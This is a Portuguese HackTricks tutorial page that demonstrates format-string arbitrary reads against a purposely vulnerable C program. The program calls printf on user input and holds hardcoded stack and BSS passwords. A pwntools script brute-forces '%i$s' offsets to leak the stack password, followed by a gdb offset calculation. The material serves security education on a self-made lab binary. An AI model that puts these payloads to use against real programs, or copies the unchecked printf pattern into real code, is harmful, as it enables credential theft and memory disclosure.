hacktricks/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md

4.2 KiB

Exemplo de Leitura Arbitrária - Strings de Formato

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Código

#include <stdio.h>
#include <string.h>

char bss_password[20] = "hardcodedPassBSS"; // Password in BSS

int main() {
char stack_password[20] = "secretStackPass"; // Password in stack
char input1[20], input2[20];

printf("Enter first password: ");
scanf("%19s", input1);

printf("Enter second password: ");
scanf("%19s", input2);

// Vulnerable printf
printf(input1);
printf("\n");

// Check both passwords
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
printf("Access Granted.\n");
} else {
printf("Access Denied.\n");
}

return 0;
}

Compile com:

clang -o fs-read fs-read.c -Wno-format-security

Ler da pilha

A stack_password será armazenada na pilha porque é uma variável local, então apenas abusar do printf para mostrar o conteúdo da pilha é suficiente. Este é um exploit para BF as primeiras 100 posições para vazar as senhas da pilha:

from pwn import *

for i in range(100):
print(f"Try: {i}")
payload = f"%{i}$s\na".encode()
p = process("./fs-read")
p.sendline(payload)
output = p.clean()
print(output)
p.close()

Na imagem é possível ver que podemos vazar a senha da pilha na posição 10ª:

Executando o mesmo exploit, mas com %p em vez de %s, é possível vazar um endereço de heap da pilha em %5$p:

A diferença entre o endereço vazado e o endereço da senha é:

> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
$1 = 0x126a
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks: